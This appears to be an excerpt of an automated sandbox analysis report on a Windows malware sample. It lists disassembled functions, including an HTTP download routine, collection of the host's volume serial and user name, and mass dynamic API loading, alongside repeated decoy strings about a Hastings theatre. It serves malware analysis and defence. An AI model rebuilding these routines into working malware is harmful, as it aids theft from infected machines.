                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00704693
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007047B5
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00704779
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00704617
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0070478F
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0070471D
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00704667
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007046C8
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007046D3
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00704622
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0070462D
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0070479F
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00704643
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00704728
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007046BD
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00704707
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateHeapProtectVirtual
                                  • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                                  • API String ID: 1542196881-2218711628
                                  • Opcode ID: 3acddb8c2dccb6c610f4940a3bba6daa31f7b28a40bd3c517e76f32cbc1ba9d5
                                  • Instruction ID: cccdebf45ab648a64cfc572665c309c5943593b2546ae94a163679d69ee8fa3a
                                  • Opcode Fuzzy Hash: 3acddb8c2dccb6c610f4940a3bba6daa31f7b28a40bd3c517e76f32cbc1ba9d5
                                  • Instruction Fuzzy Hash: 5F4108A06C26547EE634FFA4A842D9D76767F42708F417140F8007A286C67C7A674FA9

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1033 7062d0-70635b call 71aab0 call 704800 call 71aa50 InternetOpenA StrCmpCA 1040 706364-706368 1033->1040 1041 70635d 1033->1041 1042 706559-706575 call 71aab0 call 71ab10 * 2 1040->1042 1043 70636e-706392 InternetConnectA 1040->1043 1041->1040 1061 706578-70657d 1042->1061 1044 706398-70639c 1043->1044 1045 70654f-706553 InternetCloseHandle 1043->1045 1047 7063aa 1044->1047 1048 70639e-7063a8 1044->1048 1045->1042 1050 7063b4-7063e2 HttpOpenRequestA 1047->1050 1048->1050 1053 706545-706549 InternetCloseHandle 1050->1053 1054 7063e8-7063ec 1050->1054 1053->1045 1056 706415-706455 HttpSendRequestA HttpQueryInfoA 1054->1056 1057 7063ee-70640f InternetSetOptionA 1054->1057 1059 706457-706477 call 71aa50 call 71ab10 * 2 1056->1059 1060 70647c-70649b call 718ad0 1056->1060 1057->1056 1059->1061 1066 706519-706539 call 71aa50 call 71ab10 * 2 1060->1066 1067 70649d-7064a4 1060->1067 1066->1061 1071 7064a6-7064d0 InternetReadFile 1067->1071 1072 706517-70653f InternetCloseHandle 1067->1072 1076 7064d2-7064d9 1071->1076 1077 7064db 1071->1077 1072->1053 1076->1077 1080 7064dd-706515 call 71acc0 call 71abb0 call 71ab10 1076->1080 1077->1072 1080->1071
                                  APIs
                                    • Part of subcall function 0071AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0071AAF6
                                    • Part of subcall function 00704800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00704889
                                    • Part of subcall function 00704800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00704899
                                    • Part of subcall function 0071AA50: lstrcpy.KERNEL32(00720E1A,00000000), ref: 0071AA98
                                  • InternetOpenA.WININET(00720DFF,00000001,00000000,00000000,00000000), ref: 00706331
                                  • StrCmpCA.SHLWAPI(?,011DE920), ref: 00706353
                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00706385
                                  • HttpOpenRequestA.WININET(00000000,GET,?,011DE3B0,00000000,00000000,00400100,00000000), ref: 007063D5
                                  • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 0070640F
                                  • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00706421
                                  • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 0070644D
                                  • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 007064BD
                                  • InternetCloseHandle.WININET(00000000), ref: 0070653F
                                  • InternetCloseHandle.WININET(00000000), ref: 00706549
                                  • InternetCloseHandle.WININET(00000000), ref: 00706553
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                  • String ID: ERROR$ERROR$GET
                                  • API String ID: 3749127164-2509457195
                                  • Opcode ID: 96d72d62e4d946fcb57dc61b182a9792f3c3830ef22cb55c4a87b0dfce92a96f
                                  • Instruction ID: 9a198764754a49dde8a19e2148a37b6cc534f2eeeba10c8dabf294125e3223c3
                                  • Opcode Fuzzy Hash: 96d72d62e4d946fcb57dc61b182a9792f3c3830ef22cb55c4a87b0dfce92a96f
                                  • Instruction Fuzzy Hash: D87170B1A44218EBDB24DFD4DC59BEEB7B5AF44300F108199F1066B1D4DBB86A84CF51

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1356 717690-7176da GetWindowsDirectoryA 1357 7176e3-717757 GetVolumeInformationA call 718e90 * 3 1356->1357 1358 7176dc 1356->1358 1365 717768-71776f 1357->1365 1358->1357 1366 717771-71778a call 718e90 1365->1366 1367 71778c-7177a7 GetProcessHeap RtlAllocateHeap 1365->1367 1366->1365 1369 7177a9-7177b6 call 71aa50 1367->1369 1370 7177b8-7177e8 wsprintfA call 71aa50 1367->1370 1377 71780e-71781e 1369->1377 1370->1377
                                  APIs
                                  • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 007176D2
                                  • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0071770F
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00717793
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 0071779A
                                  • wsprintfA.USER32 ref: 007177D0
                                    • Part of subcall function 0071AA50: lstrcpy.KERNEL32(00720E1A,00000000), ref: 0071AA98
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                  • String ID: :$C$\
                                  • API String ID: 1544550907-3809124531
                                  • Opcode ID: bb9f4ab7524d446c4aa76824bb886a84aebb1fb714ee01fb70d14e5e6d46cd05
                                  • Instruction ID: 63269f8e5d9a4cfcc03639d35e053c28e2f824944fdb78133f846de1caddfe5c
                                  • Opcode Fuzzy Hash: bb9f4ab7524d446c4aa76824bb886a84aebb1fb714ee01fb70d14e5e6d46cd05
                                  • Instruction Fuzzy Hash: 1F41A5B1D49258EBDB10DF98CC45BDEBBB8AF08700F104099F609A72C0D7786A84CBA5
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,007011B7), ref: 00717A10
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00717A17
                                  • GetUserNameA.ADVAPI32(00000104,00000104), ref: 00717A2F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateNameProcessUser
                                  • String ID:
                                  • API String ID: 1296208442-0
                                  • Opcode ID: c959fc30b0c64d899429d0599aaeb726770754800ffb4af1d43c859498a41469
                                  • Instruction ID: 167545f4678c57ee47e6755cbf9dcb6969dd79c9d32c4f5e0e2a67eb362a304c
                                  • Opcode Fuzzy Hash: c959fc30b0c64d899429d0599aaeb726770754800ffb4af1d43c859498a41469
                                  • Instruction Fuzzy Hash: B9F0AFB1948209EFC700CFC8DC45BAEFBB8EB09711F10021AF615A2280D3741940CBA0
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExitInfoProcessSystem
                                  • String ID:
                                  • API String ID: 752954902-0
                                  • Opcode ID: e92ceaeea79ff2568ee4460bab1bdfcd71f1c28f59f833bf2badd50a4049f1c5
                                  • Instruction ID: 959831b62681747a2eee273b0ec3859621cd5e1eaae4959990e9ef0ab462174b
                                  • Opcode Fuzzy Hash: e92ceaeea79ff2568ee4460bab1bdfcd71f1c28f59f833bf2badd50a4049f1c5
                                  • Instruction Fuzzy Hash: F9D05E7494D30DEBCB04DFE098496DDFB78BB08315F400655D90562240FA306481CA65

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 633 719f20-719f2a 634 719f30-71a341 GetProcAddress * 43 633->634 635 71a346-71a3da LoadLibraryA * 8 633->635 634->635 636 71a456-71a45d 635->636 637 71a3dc-71a451 GetProcAddress * 5 635->637 638 71a463-71a521 GetProcAddress * 8 636->638 639 71a526-71a52d 636->639 637->636 638->639 640 71a5a8-71a5af 639->640 641 71a52f-71a5a3 GetProcAddress * 5 639->641 642 71a5b5-71a642 GetProcAddress * 6 640->642 643 71a647-71a64e 640->643 641->640 642->643 644 71a654-71a72a GetProcAddress * 9 643->644 645 71a72f-71a736 643->645 644->645 646 71a7b2-71a7b9 645->646 647 71a738-71a7ad GetProcAddress * 5 645->647 648 71a7bb-71a7e7 GetProcAddress * 2 646->648 649 71a7ec-71a7f3 646->649 647->646 648->649 650 71a825-71a82c 649->650 651 71a7f5-71a820 GetProcAddress * 2 649->651 652 71a922-71a929 650->652 653 71a832-71a91d GetProcAddress * 10 650->653 651->650 654 71a92b-71a988 GetProcAddress * 4 652->654 655 71a98d-71a994 652->655 653->652 654->655 656 71a996-71a9a9 GetProcAddress 655->656 657 71a9ae-71a9b5 655->657 656->657 658 71a9b7-71aa13 GetProcAddress * 4 657->658 659 71aa18-71aa19 657->659 658->659
                                  APIs
                                  • GetProcAddress.KERNEL32(75900000,011C53E0), ref: 00719F3D
                                  • GetProcAddress.KERNEL32(75900000,011C5400), ref: 00719F55
                                  • GetProcAddress.KERNEL32(75900000,011D9638), ref: 00719F6E
                                  • GetProcAddress.KERNEL32(75900000,011D96B0), ref: 00719F86
                                  • GetProcAddress.KERNEL32(75900000,011DD688), ref: 00719F9E
                                  • GetProcAddress.KERNEL32(75900000,011DD610), ref: 00719FB7
                                  • GetProcAddress.KERNEL32(75900000,011CAAB8), ref: 00719FCF
                                  • GetProcAddress.KERNEL32(75900000,011DD670), ref: 00719FE7
                                  • GetProcAddress.KERNEL32(75900000,011DD520), ref: 0071A000
                                  • GetProcAddress.KERNEL32(75900000,011DD6A0), ref: 0071A018
                                  • GetProcAddress.KERNEL32(75900000,011DD550), ref: 0071A030
                                  • GetProcAddress.KERNEL32(75900000,011C5420), ref: 0071A049
                                  • GetProcAddress.KERNEL32(75900000,011C5440), ref: 0071A061
                                  • GetProcAddress.KERNEL32(75900000,011C5460), ref: 0071A079
                                  • GetProcAddress.KERNEL32(75900000,011C5540), ref: 0071A092
                                  • GetProcAddress.KERNEL32(75900000,011DD598), ref: 0071A0AA
                                  • GetProcAddress.KERNEL32(75900000,011DD6B8), ref: 0071A0C2
                                  • GetProcAddress.KERNEL32(75900000,011CABD0), ref: 0071A0DB
                                  • GetProcAddress.KERNEL32(75900000,011C54C0), ref: 0071A0F3
                                  • GetProcAddress.KERNEL32(75900000,011DD5E0), ref: 0071A10B
                                  • GetProcAddress.KERNEL32(75900000,011DD628), ref: 0071A124
                                  • GetProcAddress.KERNEL32(75900000,011DD5C8), ref: 0071A13C
                                  • GetProcAddress.KERNEL32(75900000,011DD538), ref: 0071A154
                                  • GetProcAddress.KERNEL32(75900000,011C51C0), ref: 0071A16D
                                  • GetProcAddress.KERNEL32(75900000,011DD640), ref: 0071A185
                                  • GetProcAddress.KERNEL32(75900000,011DD5F8), ref: 0071A19D
                                  • GetProcAddress.KERNEL32(75900000,011DD5B0), ref: 0071A1B6
                                  • GetProcAddress.KERNEL32(75900000,011DD658), ref: 0071A1CE
                                  • GetProcAddress.KERNEL32(75900000,011DD580), ref: 0071A1E6
                                  • GetProcAddress.KERNEL32(75900000,011DD568), ref: 0071A1FF
                                  • GetProcAddress.KERNEL32(75900000,011DD6D0), ref: 0071A217
                                  • GetProcAddress.KERNEL32(75900000,011DD040), ref: 0071A22F
                                  • GetProcAddress.KERNEL32(75900000,011DD088), ref: 0071A248
                                  • GetProcAddress.KERNEL32(75900000,011DA628), ref: 0071A260
                                  • GetProcAddress.KERNEL32(75900000,011DCF98), ref: 0071A278
                                  • GetProcAddress.KERNEL32(75900000,011DD1A8), ref: 0071A291
                                  • GetProcAddress.KERNEL32(75900000,011C51A0), ref: 0071A2A9
                                  • GetProcAddress.KERNEL32(75900000,011DD058), ref: 0071A2C1
                                  • GetProcAddress.KERNEL32(75900000,011C51E0), ref: 0071A2DA
                                  • GetProcAddress.KERNEL32(75900000,011DD0A0), ref: 0071A2F2
                                  • GetProcAddress.KERNEL32(75900000,011DD130), ref: 0071A30A
                                  • GetProcAddress.KERNEL32(75900000,011C4E60), ref: 0071A323
                                  • GetProcAddress.KERNEL32(75900000,011C4E80), ref: 0071A33B
                                  • LoadLibraryA.KERNEL32(011DD178,?,00715EF3,00720AEB,?,?,?,?,?,?,?,?,?,?,00720AEA,00720AE7), ref: 0071A34D
                                  • LoadLibraryA.KERNEL32(011DD1F0,?,00715EF3,00720AEB,?,?,?,?,?,?,?,?,?,?,00720AEA,00720AE7), ref: 0071A35E
                                  • LoadLibraryA.KERNEL32(011DD118,?,00715EF3,00720AEB,?,?,?,?,?,?,?,?,?,?,00720AEA,00720AE7), ref: 0071A370
                                  • LoadLibraryA.KERNEL32(011DD070,?,00715EF3,00720AEB,?,?,?,?,?,?,?,?,?,?,00720AEA,00720AE7), ref: 0071A382
                                  • LoadLibraryA.KERNEL32(011DCF20,?,00715EF3,00720AEB,?,?,?,?,?,?,?,?,?,?,00720AEA,00720AE7), ref: 0071A393
                                  • LoadLibraryA.KERNEL32(011DCF80,?,00715EF3,00720AEB,?,?,?,?,?,?,?,?,?,?,00720AEA,00720AE7), ref: 0071A3A5
                                  • LoadLibraryA.KERNEL32(011DD0B8,?,00715EF3,00720AEB,?,?,?,?,?,?,?,?,?,?,00720AEA,00720AE7), ref: 0071A3B7
                                  • LoadLibraryA.KERNEL32(011DD0D0,?,00715EF3,00720AEB,?,?,?,?,?,?,?,?,?,?,00720AEA,00720AE7), ref: 0071A3C8
                                  • GetProcAddress.KERNEL32(75FD0000,011C5120), ref: 0071A3EA
                                  • GetProcAddress.KERNEL32(75FD0000,011DD0E8), ref: 0071A402
                                  • GetProcAddress.KERNEL32(75FD0000,011D9280), ref: 0071A41A
                                  • GetProcAddress.KERNEL32(75FD0000,011DD100), ref: 0071A433
                                  • GetProcAddress.KERNEL32(75FD0000,011C5040), ref: 0071A44B
                                  • GetProcAddress.KERNEL32(734B0000,011CAE28), ref: 0071A470
                                  • GetProcAddress.KERNEL32(734B0000,011C4F20), ref: 0071A489
                                  • GetProcAddress.KERNEL32(734B0000,011CADB0), ref: 0071A4A1
                                  • GetProcAddress.KERNEL32(734B0000,011DD1C0), ref: 0071A4B9
                                  • GetProcAddress.KERNEL32(734B0000,011DCFB0), ref: 0071A4D2
                                  • GetProcAddress.KERNEL32(734B0000,011C4DE0), ref: 0071A4EA
                                  • GetProcAddress.KERNEL32(734B0000,011C4EC0), ref: 0071A502
